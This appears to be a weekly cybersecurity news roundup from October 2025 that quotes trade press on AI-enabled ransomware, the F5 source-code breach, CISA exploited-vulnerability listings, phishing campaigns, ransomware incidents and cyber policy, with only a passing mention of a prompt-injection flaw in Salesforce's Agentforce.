  • “As ransomware attacks accelerate in speed and sophistication, 38% of security leaders rank AI-enabled ransomware as their top concern — the most frequently cited worry about AI-related security issues according to CSO’s new 2025 Security Priorities study.
  • “That concern appears to already be well founded, as a second study released today, CrowdStrike’s 2025 State of Ransomware Survey, provides a snapshot of how the ransomware threat is evolving, revealing cybersecurity pros’ fears surrounding the use of AI in ransomware attack chains, as well as the need to for CISOs to build better — and more intelligent — defenses to match AI-powered attackers.
  • “From malware development to social engineering, adversaries are weaponizing AI to accelerate every stage of attacks, collapsing the defender’s window of response,” Elia Zaitsev, CTO at CrowdStrike, said in announcing the survey’s findings. “The 2025 State of Ransomware Survey reinforces that legacy defenses can’t match the speed or sophistication of AI-driven attacks. Time is the currency of modern cyber defense — and in today’s AI-driven threat landscape, every second counts.”

• Cybersecurity Dive seconds the CSO report,
  • “The vast majority of ransomware-as-a-service groups are using AI-powered tools, which are “almost certainly increasing the speed of ransomware attacks,” the security firm ReliaQuest said in a report published on Tuesday.
  • “One sign that automation is making a difference: Attackers’ breakout time — the measure of how long it took them to go from initial access to compromising other devices — dropped from 48 minutes in 2024 to 18 minutes in the middle of 2025, the company said.
  • “RaaS groups are offering AI-powered tools such as antivirus detection and “features to automatically kill software that prevents ransomware execution,” according to the report.”

• Per Industrial Cyber,
  • “Trend Micro researchers identified the Agenda ransomware group, also known as Qilin, deploying a Linux-based ransomware binary on Windows hosts by exploiting legitimate remote management and file transfer tools. This cross-platform approach bypasses Windows-focused detections and conventional endpoint security solutions. The technique allows low-noise operations, including theft of backup credentials to disable recovery options and neutralization of endpoint defenses using BYOVD (Bring Your Own Vulnerable Driver) attacks.
  • “Since January 2025, Agenda ransomware has affected 591 victims across 58 countries, primarily in developed markets and high-value industries. Most victims were in the U.S., Canada, and the U.K., with manufacturing, technology, financial services, and healthcare among the hardest hit. Any environment using remote access platforms, centralized backup solutions, or hybrid Windows/Linux infrastructures is at risk. Enterprises are advised to restrict remote access tools to authorized hosts and continuously monitor for unusual activity.”

• Per SC Media,
  • “HackRead reports that U.S. multinational media and telecommunications conglomerate Comcast Corporation had 186.36 GB of compressed data, amounting to 834 GB of stolen information, exposed by the Medusa ransomware gang following its refusal to pay the $1.2 million ransom demand.
  • “Medusa has posted the data for download in 47 files, with most of the files sized at 4 GB. Earlier analysis of the data sample posted by Medusa in late September showed Excel files indicating claim data specifications, as well as multiple auto premium impact analysis-related Python and SQL scripts, according to Cybernews researchers.
  • “Comcast has yet to acknowledge Medusa’s posting. Such a development comes just weeks after Medusa was noted by Microsoft to have launched attacks leveraging the maximum severity GoAnywhere MFT flaw, tracked as CVE-2025-10035, to facilitate unauthenticated remote code execution.”

From the cybersecurity industry and defenses front,

• Cyberscoop reports,
  • “Veeam announced Tuesday [October 21] it agreed to acquire Securiti AI for $1.725 billion, marking the data protection company’s largest acquisition and its entry into the artificial intelligence security market as enterprises struggle to deploy AI systems safely.
  • The deal, expected to close in early December, comes as organizations face mounting challenges in managing data across fragmented systems while attempting to launch AI initiatives.
  • “Securiti AI, based in San Jose, Calif., specializes in data security management and provides tools that help organizations understand what data they have, who can access it, and how it’s being used across hybrid cloud environments. The company uses a knowledge graph to map relationships between data assets, users, AI models and compliance requirements.
  • “Veeam, headquartered in Kirkland, Wash., makes software for backing up and recovering data after ransomware attacks and other breaches. The combination aims to address what both companies describe as a critical gap: enterprises cannot safely deploy AI without knowing whether the data feeding those systems is secure, properly governed and accessible only to authorized users.”

• CIO explains why containment is the key to ransomware defense.
  • “Security leaders tasked with thwarting ransomware attacks must leverage containment techniques to prevent breaches from causing widespread chaos.
  • “Containment strategies reduce the blast radius of a cyberthreat by limiting or preventing the lateral movements of an intruder who succeeds in breaking into your network, a topic covered in a recent post.
  • “It’s a strategy that, when properly implemented, can all but eliminate the possibility of a catastrophic ransomware attack, says John Kindervag, chief evangelist at Illumio and the creator of Zero Trust.”

• Cyberscoop lets us know,
  • “In recent years, the cybersecurity industry has made significant strides in securing endpoints with advanced Endpoint Detection and Response (EDR) solutions, and we have been successful in making life more difficult for our adversaries. 
  • “While this progress is a victory, it has also produced a predictable and dangerous consequence where threat actors are shifting their focus to the network perimeter, a domain often plagued by technical debt and forgotten hardware.
  • “The recent cyber espionage campaign by the China-linked group Salt Typhoon demonstrates this shift. It is the latest in a series of attacks that highlight a dangerous and common thread connecting them to other major adversaries, including Russia’s Static Tundra and various ransomware groups. 
  • “These groups are all exploiting the ghosts in our networks. Old, unpatched, and forgotten routers, VPNs, and firewalls that make up our network perimeter are making very attractive targets. * * *
  • “Not only does this represent an unprecedented level of tactical threat advancement, but it showcases a deep understanding from our adversaries of how U.S. and allied networks are being defended today. These attackers have shown us that they are now capable of operating invisibly within the systems built to protect against them, compromising our national resilience.
  • “This also highlights a critical lesson: a patch is not a time machine. It cannot undo a previous compromise. End-of-Life (EoL) devices forgotten in time are not forgotten by exploit writers after the patches stop. These “forgotten” devices may be out of sight for network administrators, but they are front and center for our adversaries. We must treat them as the critical risks they are.
  • “The path to a stronger national security posture lies in mastering the fundamentals that are too often neglected and establishing a proactive security program to anticipate and counter threats.”

• Dark Reading points out,
  • “Most successful cyberattacks target end users through social engineering. They also exploit systems left vulnerable due to user errors. This is why securing the human element is crucial to managing cyber-risks in the modern era. 
  • “As recent headlines of data breaches, business disruptions, and threats demonstrate, the situation is dire. Despite the investment in security awareness training programs, many organizations are not receiving what they need. The average security awareness training program remains lackluster, at best, offering semi-annual cookie-cutter modules that drop a few factoids about security trends, hit users with a spot-the-phish game, or even surprise them with a simulation. As long as the click-through rates on phishing emails remain relatively low, the programs are considered successful. 
  • “The poor security outcomes should speak for themselves: This kind of training isn’t helping move the needle on risk.   
  • “Leading organizations are moving beyond the habits of ho-hum programs to deliver training that not only changes users’ insecure behaviors but also empowers them to take actions that boost the organization’s overall defense. One of the most fundamental shifts that effective security training programs are making is that they’re starting to dump the “awareness” label altogether.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• The White House issued a proclamation yesterday about October being Cybersecurity Awareness Month so let’s go.

• Per Cyberscoop,
  • “European law enforcement dismantled and seized an expansive cybercrime operation used to facilitate phishing attacks via mobile networks for fraud, including account intrusions, credential and financial data theft, Europol said Friday [October 17].
  • “Investigators from Austria, Estonia and Latvia linked the cybercrime networks to more than 3,200 fraud cases, which also involved investment scams and fake emergencies for financial gain. Financial losses amounted to about $5.3 million in Austria and $490,000 in Latvia, authorities said.
  • “The operation dubbed “SIMCARTEL” netted seven arrests and the seizure of 1,200 SIM box devices, which contained 40,000 active SIM cards that were used to conduct various cybercrimes over telecom networks. Officials described the infrastructure as highly sophisticated, adding that the online service it supported provided telephone numbers for criminal activities to people in more than 80 countries.”
• and
  • “A Massachusetts man who previously pleaded guilty to a cyberattack on PowerSchool, exposing data on tens of millions of students and teachers, was sentenced to four years in prison Tuesday — half the amount federal prosecutors sought in sentencing recommendations submitted to the court.
  • “Matthew Lane, 20, stole data from PowerSchool belonging to nearly 70 million students and teachers, extorted the California-based company for a ransom, which it paid, causing the education software vendor more than $14 million in financial losses, according to prosecutors.
  • “U.S. District Judge Margaret Guzman sentenced Lane to four years in prison, followed by three years of supervised release. Lane was also ordered to pay almost $14.1 million in restitution and a $25,000 fine for crimes involving the attack on PowerSchool and an undisclosed U.S. telecommunications company.”

From the cybersecurity vulnerabilities and breaches front,

• Cyberscoop reports,
  • “Federal cyber authorities issued an emergency directive Wednesday [October 15] requiring federal agencies to identify and apply security updates to F5 devices after the cybersecurity vendor said a nation-state attacker had long-term, persistent access to its systems.
  • The order, which mandates federal civilian executive branch agencies take action by Oct. 22, marked the second emergency directive issued by the Cybersecurity and Infrastructure Security Agency in three weeks. CISA issued both of the emergency directives months after impacted vendors were first made aware of attacks on their internal systems or products.
  • F5 said it first learned of unauthorized access to its systems Aug. 9, resulting in data theft including segments of BIG-IP source code and details on vulnerabilities the company was addressing internally at the time. CISA declined to say when F5 first alerted the agency to the intrusion.
  • CISA officials said they’re not currently aware of any federal agencies that have been compromised, but similar to the emergency directive issued following an attack spree involving zero-day vulnerabilities affecting Cisco firewalls, they expect the response and mitigation efforts to provide a better understanding of the scope of any potential compromise in federal networks.
• and
  • “F5, a company that specializes in application security and delivery technology, disclosed Wednesday that it had been the target of what it’s calling a “highly sophisticated” cyberattack, which it attributes to a nation-state actor. The announcement follows authorization from the U.S. Department of Justice, which allowed F5 to delay public disclosure of the breach under Item 1.05(c) of Form 8-K due to ongoing law enforcement considerations.
  • “According to an 8-K form filed with the Securities and Exchange Commission, the company first became aware of unauthorized access Aug. 9 and initiated standard incident response measures, including enlisting external cybersecurity consultants. In September, the Department of Justice permitted F5 to withhold public disclosure of the breach, which the government allows if a breach is determined to be a “a substantial risk to national security or public safety.”  
  • “Investigators discovered that the threat actor maintained prolonged access to parts of F5’s infrastructure. Systems affected included the BIG-IP product development environment and the company’s engineering knowledge management platform. The unauthorized access resulted in the exfiltration of files, some of which contained segments of BIG-IP source code and details regarding vulnerabilities that the company was actively addressing at the time. It also said the files taken were “configuration or implementation information for a small percentage of customers.”

• Cybersecurity Dive adds,
  • “More than 600,000 F5 network security devices running the company’s flagship BIG-IP software are sitting unpatched on the internet one day after the company revealed that nation-state hackers had accessed its networks and source code.
  • “The figure, which Palo Alto Networks provided on Thursday [October 16], highlights how many organizations could be vulnerable to cyberattacks exploiting vulnerabilities that the unidentified hackers discovered while roaming through F5’s production environment and developer resources.” * * *
  • “F5, which said on Thursday that it believed it had kicked the hackers out of its networks, is working with government and private-sector cyber experts to further investigate the compromise. CISA ordered federal agencies to promptly patch their affected F5 products and disconnect the devices’ management interfaces from the internet.
  • “The potential impact of this compromise is unique due to the theft of confidential information regarding previously undisclosed vulnerabilities that F5 was actively in the process of patching,” Palo Alto Networks researchers wrote in their blog post. “This data potentially grants threat actors the capacity to exploit vulnerabilities for which no public patch currently exists, which could accelerate the creation of exploits.”
  • “F5 said there was no evidence that the hackers had compromised its source code or software production processes, despite having access to those systems and data.”

• CISA added six known exploited vulnerabilities to its catalog this week.
  • October 14, 2025
    • CVE-2016-7836 SKYSEA Client View Improper Authentication Vulnerability
    • CVE-2025-6264 Rapid7 Velociraptor Incorrect Default Permissions Vulnerability
    • CVE-2025-24990 Microsoft Windows Untrusted Pointer Dereference Vulnerability
    • CVE-2025-47827 IGEL OS Use of a Key Past its Expiration Date Vulnerability
    • CVE-2025-59230 Microsoft Windows Improper Access Control Vulnerability
      • Security Affairs Discusses these KVEs here.
  • October 15, 2025
    • CVE-2025-54253 Adobe Experience Manager Forms Code Execution Vulnerability
      • Security Week discusses this KVE here.

• Per Cyberscoop,
  • “North Korean operatives that dupe job seekers into installing malicious code on their devices have been spotted using new malware strains and techniques, resulting in the theft of credentials or cryptocurrency and ransomware deployment, according to researchers from Cisco Talos and Google Threat Intelligence Group.
  • “Cisco Talos said it observed an attack linked to Famous Chollima that involved the use of BeaverTail and OtterCookie — separate but complementary malware strains frequently used by the North Korea-aligned threat group. Researchers said their analysis determined the extent to which BeaverTail and OtterCookie have merged and displayed new functionality in recent campaigns. 
  • “GTIG said it observed UNC5342 using EtherHiding, malicious code in the form of JavaScript payloads that turn a public blockchain into a decentralized command and control server. Researchers said UNC5342 incorporated EtherHiding into a North Korea-aligned social engineering campaign previously dubbed Contagious Interview by Palo Alto Networks. 
  • “Cisco and Google both said North Korean threat groups’ use of more specialized and evasive malware underscores the efforts the nation-state attackers are taking to achieve multiple goals while avoiding more common forms of detection.”

• Per Dark Reading,
  • “Major password managers are being impersonated in a spate of recent phishing attacks, including LastPass, Bitwarden, and 1Password, and enterprise users should be on notice. In a three-week span, all of them have been dealing with impersonation attacks by threat actors trying to con users into handing over their master password — and with it, troves of sensitive credentials.
  • “Password management vendors have long been among hackers’ favorite brands to impersonate, for good reason. Users need to have complete trust in their password managers — after all, nobody would store all of their credentials for all of their accounts in an app they didn’t have total confidence in. Phishers try to exploit that trust.
  • “Because password managers are protected by a single master password, a password reset scam — “Your password has been compromised, click here to reset it” — might engender more fear and urgency in this context than in others with lower stakes (that is, unless the user understands the basic mechanics of how their manager works — namely, that their master password would never be stored online to begin with). And of course, if attackers can get their hands on just that one master password, they can access all of a user’s online accounts, plus all of the huge corporate systems they might afford access to.
  • “Either by coincidence or reflecting a growing trend, password manager phishing attacks have been popping up even more than usual this October, cyber researchers are warning.”
    
• Per Bleeping Computer,
  • “Threat actors exploited a recently patched remote code execution vulnerability (CVE-2025-20352) in Cisco networking devices to deploy a rootkit and target unprotected Linux systems.
  • “The security issue leveraged in the attacks affects the Simple Network Management Protocol (SNMP) in Cisco IOS and IOS XE and leads to RCE if the attacker has root privileges.
  • “According to cybersecurity company Trend Micro, the attacks exploited the flaw in Cisco 9400, 9300, and legacy 3750G series devices and deployed rootkits on “older Linux systems that do not have endpoint detection response solutions.”
• and
  • “Earlier this week, Microsoft patched a vulnerability that was flagged with the “highest ever” severity rating received by an ASP.NET Core security flaw.
  • “This HTTP request smuggling bug (CVE-2025-55315) was found in the Kestrel ASP.NET Core web server, and it enables authenticated attackers to smuggle another HTTP request to hijack other users’ credentials or bypass front-end security controls.
  • “An attacker who successfully exploited this vulnerability could view sensitive information such as other user’s credentials (Confidentiality) and make changes to file contents on the target server (Integrity), and they might be able to force a crash within the server (Availability),” Microsoft said in a Tuesday advisory.”

• Per InfoSecurity Magazine,
  • “The phishing platform “Whisper 2FA” has rapidly become one of the most active tools used in large-scale credential theft campaigns, according to new research from Barracuda.
  • “Since July 2025, the platform has been responsible for nearly one million phishing attacks targeting accounts across multiple industries, placing it just behind Tycoon and EvilProxy in the global phishing-as-a-service (PhaaS) landscape.
  • “What makes Whisper 2FA stand out is its use of AJAX, a web technology that allows real-time communication between browser and server without page reloads. This enables the phishing kit to repeatedly capture credentials and multi-factor authentication (MFA) codes until it obtains a valid token. 
  • “Unlike typical phishing kits that stop after stealing a password, Whisper 2FA continuously loops through attempts, effectively bypassing MFA protections.
  • “Attackers have been using a range of lures to deliver Whisper 2FA, mimicking brands such as DocuSign, Adobe and Microsoft 365. These phishing emails often use urgent pretexts, such as invoices or voicemail notifications, to prompt users to log in and unknowingly submit their details to attackers.”

From the ransomware front,

• Microsoft tells us,
  • “In 80% of the cyber incidents Microsoft’s security teams investigated last year, attackers sought to steal data—a trend driven more by financial gain than intelligence gathering. According to the latest Microsoft Digital Defense Report, written with our Chief Information Security Officer Igor Tsyganskiy, over half of cyberattacks with known motives were driven by extortion or ransomware. That’s at least 52% of incidents fueled by financial gain, while attacks focused solely on espionage made up just 4%. Nation-state threats remain a serious and persistent threat, but most of the immediate attacks organizations face today come from opportunistic criminals looking to make a profit.
  • “Every day, Microsoft processes more than 100 trillion signals, blocks approximately 4.5 million new malware attempts, analyzes 38 million identity risk detections, and screens 5 billion emails for malware and phishing. Advances in automation and readily available off-the-shelf tools have enabled cybercriminals—even those with limited technical expertise—to expand their operations significantly. The use of AI has further added to this trend with cybercriminals accelerating malware development and creating more realistic synthetic content, enhancing the efficiency of activities such as phishing and ransomware attacks. As a result, opportunistic malicious actors now target everyone—big or small—making cybercrime a universal, ever-present threat that spills into our daily lives.
  • “In this environment, organizational leaders must treat cybersecurity as a core strategic priority—not just an IT issue—and build resilience into their technology and operations from the ground up. In our sixth annual Microsoft Digital Defense Report, which covers trends from July 2024 through June 2025, we highlight that legacy security measures are no longer enough; we need modern defenses leveraging AI and strong collaboration across industries and governments to keep pace with the threat. For individuals, simple steps like using strong security tools—especially phishing-resistant multifactor authentication (MFA)—makes a big difference, as MFA can block over 99% of identity-based attacks.”

• HIPAA Journal reports,
  • “Kettering Health has provided an update on its May 20, 2025, ransomware attack. The investigation confirmed that the Interlock ransomware group first gained access to its network on April 9, 2025, and retained access until May 20, 2025, when the attack was detected and the unauthorized access was blocked. During that time, the ransomware group accessed or copied files containing patient information.
  • “Kettering Health has been providing regular updates on its progress recovering from the attack and has now completed its file review. The review confirmed that current and former patients had the following information compromised in the attack: first and last name, contact information, date of birth, Social Security number, patient identification number, medical record number, medical information, treatment information, diagnosis information, health insurance information, driver’s license/state identification number, financial account information, and/or education records.
  • “Kettering Health said it has reviewed its policies, procedures, and processes related to data security and has taken steps to prevent similar incidents in the future. Kettering Health said it is unaware of any misuse of the exposed information and has provided patients with information on how they can protect themselves against identity theft and fraud. Complimentary credit monitoring and identity theft protection services do not appear to have been offered.”

• The Record adds,
  • “Michigan City, Indiana, has confirmed that a damaging cyber incident three weeks ago that impacted government systems was a ransomware attack.  
  • “The Indiana city located on the south shore of Lake Michigan was forced to take many systems offline on September 23 and initially called it a “network disruption.” 
  • “On Saturday [October 11], the city acknowledged it was hit with a ransomware attack “that affected a portion of the City’s data and impacted municipal employees’ online and telephone access.” * * *
  • “On Monday, the Obscura ransomware gang took credit for the attack and said they stole 450 gigabytes of data. The group claimed that the time on their ransom had expired and  that they posted all of the data that was taken during the cyberattack. Obscura emerged last month and has since named more than 15 victims.”  

• Dark Reading points out,
  • “Harvard University confirmed that it fell victim to an attack exploiting the recently disclosed zero-day vulnerability in Oracle’s E-Business Suite (EBS) system.
  • “The critical vulnerability, tracked as CVE-2025-61882, allows an attacker without authentication to remotely access EBS instances. The flaw has been exploited by the notorious Clop ransomware gang in attacks on Oracle customers.   
  • “Harvard is aware of reports that data associated with the University has been obtained as a result of a zero-day vulnerability in the Oracle E-Business Suite system,” the University told Dark Reading. “This issue has impacted many Oracle E-Business Suite customers and is not specific to Harvard. While the investigation is ongoing, we believe that this incident impacts a limited number of parties associated with a small administrative unit.”
• and
  • “Microsoft disrupted a Rhysida ransomware campaign that used fake Teams binaries signed with digital certificates, including many from Microsoft’s own service. 
  • “In a social media post on X, Microsoft Threat Intelligence on Wednesday said it revoked more than 200 code-signing certificates issued by Azure’s Trusted Signing service. These certificates are sometimes abused by threat actors to make malware appear as if it is legitimate, trusted software.
  • “According to the post, a cybercriminal group tracked by Microsoft as Vanilla Tempest crafted the fake Teams files to drop a backdoor known as “Oyster,” which allowed attackers to eventually deliver Rhysida ransomware in victims’ networks.
  • “Vanilla Tempest, also known as Vice Society, has a track record of targeting healthcare organizations and public schools, though it’s unclear what organizations the group was targeting with its latest campaign.”
     
• Wiz notes,
  • “Cloud ransomware targets data and systems in cloud environments by exploiting cloud-native features and APIs rather than just encrypting local files
  • “Attackers have evolved beyond simple encryption to use sophisticated tactics like data exfiltration, deletion, and manipulation of cloud services
  • “Common attack vectors include compromised credentials, misconfigured storage, overly permissive identities, and supply chain compromises
  • “Defending against cloud ransomware requires cloud-native detection and prevention strategies with deep visibility across your entire environment.”

From the cybersecurity defenses front,

• Cybersecurity Dive reports,
  • “Fortune 500 companies have seen the structure of their security operations teams evolve in recent years, with four of every 10 companies assigning a dedicated, deputy chief information security officer or an equivalent leadership role, according to a report released Thursday from IANS Research and Artico Search. 
  • “A deputy CISO steps in when the CISO is unavailable and is seen as the eventual successor to the CISO in the company’s risk management hierarchy, according to researchers. 
  • “In practical terms, the deputy CISO often either holds a dual role as a functional department head who takes on additional executive leadership responsibility or operates as a chief of staff who also takes on CISO-like responsibilities that the CISO needs to delegate,” Nick Kakolowski, senior research director at IANS Research told Cybersecurity Dive via email.”

• Beckers Hospital Review calls attention to six notes about health system efforts to sharpen their cybersecurity and margins narrow.

• Dark Reading relates,
  • “Agentic AI deployments are becoming an imperative for organizations of all sizes looking to boost productivity and streamline processes, especially as major platforms like Microsoft and Salesforce build agents into their offerings. In the rush to deploy and use these helpers, it’s important that businesses understand that there’s a shared security responsibility between vendor and customer that will be critical to the success of any agentic AI project.
  • “The stakes in ignoring security are potentially high: last month for instance, AI security vendor Noma detailed how it discovered “ForcedLeak,” a critical severity vulnerability chain in Salesforce’s agentic AI offering Agentforce, which could have allowed a threat actor to exfiltrate sensitive CRM data from a customer with improper security controls through an indirect prompt injection attack. Although Salesforce addressed the issue through updates and access control recommendations, ForcedLeak is but one example of the potential for agents to leak sensitive data, either through improper access controls, ingested secrets, or a prompt injection attack.
  • “It’s not an easy task to add agentic AI security to the mix; it’s already challenging enough to determine where responsibility and culpability lie with traditional software and cloud deployments. With something like AI, where the technology can be hastily rolled out (by both vendor and customer alike) and is constantly evolving, establishing those barriers can prove even more complex.” 
     
• TechRadar explains “how to plan a smooth Windows 10 to Windows 11 migration – even if you missed the October 14th [support] deadline.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front.

• Cyberscoop tells us,
  • “A top Senate Democrat introduced legislation Thursday to extend and rename an expired information-sharing law, and make it retroactive to cover the lapse that began Oct. 1.
  • “Michigan Sen. Gary Peters, the ranking member of the Homeland Security and Governmental Affairs Committee, introduced the Protecting America from Cyber Threats (PACT) Act, to replace the expired Cybersecurity and Information Sharing Act of 2015 (CISA 2015) that has provided liability protections for organizations that share cyber threat data with each other and the federal government. Industry groups and cyber professionals have called those protections vital, sometimes describing the 2015 law as the most successful cyber legislation ever passed.
  • “The 2015 law shares an acronym with the Cybersecurity and Infrastructure Security Agency, which some Republicans — including the chairman of Peters’ panel, Rand Paul of Kentucky — have accused of engaging in social media censorship. As CISA 2015 has lapsed and Peters has tried to renew it, “some people think that’s a reauthorization of the agency,” Peters told reporters Thursday in explaining the new bill name.” * * *
  • “Michael Daniel, leader of the Cyber Threat Alliance made up of cybersecurity companies, told CyberScoop that his organization hasn’t been affected by the lapse yet, but that’s partially because it’s an organization that was set up with the long term in mind, with a formalized structure that included information-sharing requirements for members.
  • “The lapse might also not immediately affect other organizations, he said, comparing it to the risks of the government shutdown underway.
  • “An hour-long lapse doesn’t really do very much, but the longer it goes on, the more you have time for organizations to say, ‘Well, maybe we need to reconsider what we’re doing, maybe we need to think about it differently,’” Daniel said. “The longer it goes on, you start having questions about, ‘Maybe this thing won’t get reauthorized down the road.’ And once you start questioning the long-term prospects, that’s when people start making changes in their behavior.”

• The American Hospital Association News (“AHA”) informs us,
  • “The Health Sector Coordinating Council Oct. 7 released its Sector Mapping and Risk Toolkit, created to help health care providers and other organizations visualize key services that support essential health care workflows and determine which of them present critical risk of cyberattack disruption capable of impacting care delivery, operations and liquidity. The toolkit consists of 17 health care workflow maps and usage guidelines and encourages organizations to prioritize their risks, mitigate them where possible and develop recovery and continuity plans that cannot be controlled or mitigated.
  • “The SMART initiative was created in April 2024 as a response to the cyberattack on Change Healthcare two months earlier. The AHA contributed the development of this project, which has helped identify these systemically important, mission-critical services for health care.”

• AHA President and CEO Rick Pollack writes in the AHA News about his thoughts on this Cybersecurity Awareness Month.
  • “This week, the FBI issued an urgent warning to all users — including hospitals — of a critical security soft spot within Oracle’s E-Business Suite, stating “This is ‘stop-what-you’re-doing and patch immediately vulnerability.’”
  • “The vulnerability has allowed cyber bad actors to carry out data theft ransomware attacks. Oracle is offering a patch to address the security problem.
  • “This latest threat reminds us that cybercrime is ever-present, and health care has been the No. 1 target for years. Hospitals and health systems are committed to taking every possible precaution to protect system operability and patients’ personal data, and the good news is their defenses block most attacks.
  • “But no individual hospital can defend against all of these very sophisticated criminal and nation-state sponsored attacks. That’s why we need a whole-of-government approach to preventing and mitigating cyberattacks, including the federal government going after the bad guys as it has effectively done in counterterrorism.
  • “As we observe Cybersecurity Awareness Month this October, we must remain aware that the scope, frequency and sophistication of cyber incursions into health care have increased steadily. The evolving tactics used by bad actors to steal information, encrypt systems, delay and disrupt patient care, and shut down vital systems continue to put patient care and safety at risk.”

• Dark Reading adds,
  • “Last night [October 9, 2025], the FBI, in coordination with law enforcement in France, seized the latest version of the BreachForums’ underground forum domain, which was converted earlier this month into an extortion site used by Scattered Lapsus$ Hunters, the gang behind the recent high-profile spate of Salesforce data heists.
  • “Scattered Lapsus$ Hunters is an apparent combination of the Scattered Spider, Lapsus$, and ShinyHunters cybercriminal groups that first emerged this past summer. It has been busy compromising Salesforce data and claims that Salesforce victims have up until midnight Eastern Time today, Oct. 10, to meet its ransom demands before it will start publishing the stolen records. 
  • “Despite the BreachForums site being taken down, the group’s Tor Dark Web site is still accessible, and will be used to leak the data, the threat actors claimed.
  • “Aside from Salesforce data, Scattered Lapsus$ Hunters claims to have 1 billion records and 39 victim organizations listed on the site with sample data, such as Chanel, Disney and Hulu, Marriot, Google, Toyota, FedEx, and many more.
  • “For its part, Salesforce has issued its own statement, acknowledging the extortion attempts and reiterating that there is no indication that the Salesforce platform itself had been compromised.”

From the cybersecurity vulnerabilities and breaches front,

• Cyberscoop reports,
  • “A brute-force attack exposed firewall configuration files of every SonicWall customer who used the company’s cloud backup service, the besieged vendor said Wednesday.
  • “An investigation aided by Mandiant confirmed the totality of compromise that occurred when unidentified attackers hit a customer-facing system of SonicWall controls. The company previously said less than 5% of its firewall install base stored backup firewall configuration files in the cloud-based service.
  • “SonicWall did not answer questions about the extent to which the investigation revealed a more widespread impact for its customers, or if its assessment of that 5% figure remained accurate. The company initially revised its disclosure to clarify the scope of exposure was less than 5% of firewalls as of Sept. 17 but has since removed that detail from the blog post. 
  • “The investigation confirmed that an unauthorized party accessed firewall configuration backup files for all customers who have used SonicWall’s cloud backup service,” the company said in a statement.” * * *
  • “Fourteen defects affecting the vendor’s products have been added to the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities (KEV) catalog since late 2021. Nine of those defects are known to be used in ransomware campaigns, according to CISA, including a wave of about 40 Akira ransomware attacks between mid-July and early August.
  • “While those attacks were linked to exploited vulnerabilities in SonicWall devices, the latest attack marked a direct hit on SonicWall’s internal infrastructure and practices.”

• Security Week tells us,
  • Law firm Williams & Connolly said state-sponsored hackers breached some of its systems and gained access to attorney email accounts.
  • “The prominent Washington, DC-based law firm is known for representing political figures and government officials, including Barack Obama and the Clintons, as well as major companies such as Intel, Samsung, Google, Disney, and Bank of America. 
  • “According to a statement issued by the company, an investigation conducted with the assistance of CrowdStrike showed that the hackers exploited an unspecified zero-day vulnerability to gain access to a “small number” of attorneys’ email accounts. 
  • “The probe showed that the attack was likely the work of a state-sponsored hacker group known to have recently targeted law firms and other companies. 
  • “Williams & Connolly said there was no evidence that confidential client data was stolen or that other parts of its IT system had been compromised. 
  • “While the company’s statement does not mention China, The New York Times learned that Chinese hackers targeted Williams & Connolly, along with other law firms.”

• The Cybersecurity and Infrastructure Security Agency (CISA) added nine known exploited vulnerabilities to its catalog this week.
  • October 6, 2025
    • CVE-2010-3765 Mozilla Multiple Products Remote Code Execution Vulnerability
    • CVE-2010-3962 Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
    • CVE-2011-3402 Microsoft Windows Remote Code Execution Vulnerability
    • CVE-2013-3918 Microsoft Windows Out-of-Bounds Write Vulnerability
    • CVE-2021-22555 Linux Kernel Heap Out-of-Bounds Write Vulnerability
    • CVE-2021-43226 Microsoft Windows Privilege Escalation Vulnerability
    • CVE-2025-61882 Oracle E-Business Suite Unspecified Vulnerability 
      • Cyberscoop and Cybersecurity Dive discuss the Oracle KVE.
      • DVE discusses the Microsoft Internet Explorer KVE
      • Cyber Press discusses the Microsoft Windows Privilege Escalation KVE
      • Security Affairs discusses the other KVEs.
  • October 7, 2025
    • CVE-2025-27915. Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability
      • Cyber Press discusses this KVE.
  • October 9, 2025
    • CVE-2021-43798 Grafana Path Traversal Vulnerability
      • Cybersecurity News discusses this KVE.
        
• Per Bleeping Computer,
  • “Threat actors are exploiting a zero-day vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox products, which allows a local attacker to access system files without authentication.
  • “At least three companies have been targeted so far. Although a patch is not yet available, customers can apply mitigations.
  • “CentreStack and Triofox are Gladinet’s business solutions for file sharing and remote access that allow using a company’s own storage as a cloud. According to the vendor, CentreStack “is used by thousands of businesses from over 49 countries.”

• Cardiovascular Business relates,
  • “The U.S. Food and Drug Administration (FDA) has announced another new recall for Johnson & Johnson MedTech’s Automated Impella Controller (AIC) due to a significant cybersecurity risk. 
  • “If the identified cybersecurity vulnerabilities are exploited, it may affect the essential performance of the AIC,” according to the FDA’s advisory.
  • “At this time, no cyberattacks have been tied to this specific issue. This is the fourth time in three months the FDA has shared serious safety concerns related to these devices, which serve as the primary user control interface for Impella catheters.” 

• Per Cybersecurity Dive,
  • “AI isn’t yet transforming how hackers launch phishing attacks, although it is helping them clean up their lures, the security firm Intel 471 said in a report published on Wednesday.
  • “Several factors have combined to keep AI in an evolutionary rather than revolutionary role, the report found.
  • “Still, business and government leaders need to pay attention to several increasingly common AI-assisted attack strategies.”

From the ransomware front,

• Sophos shares its 2025 report on the state of ransomware in healthcare.
  • “Sophos’ latest annual study explores the real-world ransomware experiences of 292 healthcare providers hit by ransomware in the past year. The report examines how the causes and consequences of these attacks have evolved over time. This year’s edition also sheds new light on previously unexplored areas, including the organizational factors that left providers exposed and the human toll ransomware takes on retail IT and cybersecurity teams.”

• TRM Labs point out “Nine Emerging Groups Shaping the Ransomware Landscape.”
  • “Artificial intelligence (AI) has lowered the barrier to entry for cybercriminals, allowing ransomware threat actors to automate coding, generate polymorphic malware — which alters its code with each infection to evade detection — and create more convincing social engineering lures. As a result, new groups are emerging rapidly, and established groups are scaling their operations. 
  • “In this post, we take a closer look at nine emerging ransomware groups and examine how their off-chain and on-chain tactics are reshaping the ecosystem.”

• The Hacker News relates,
  • “Three prominent ransomware groups DragonForce, LockBit, and Qilin have announced a new strategic ransomware alliance, once underscoring continued shifts in the cyber threat landscape.
  • “The coalition is seen as an attempt on the part of the financially motivated threat actors to conduct more effective ransomware attacks, ReliaQuest said in a report shared with The Hacker News.
  • “Announced shortly after LockBit’s return, the collaboration is expected to facilitate the sharing of techniques, resources, and infrastructure, strengthening each group’s operational capabilities,” the company noted in its ransomware report for Q3 2025.
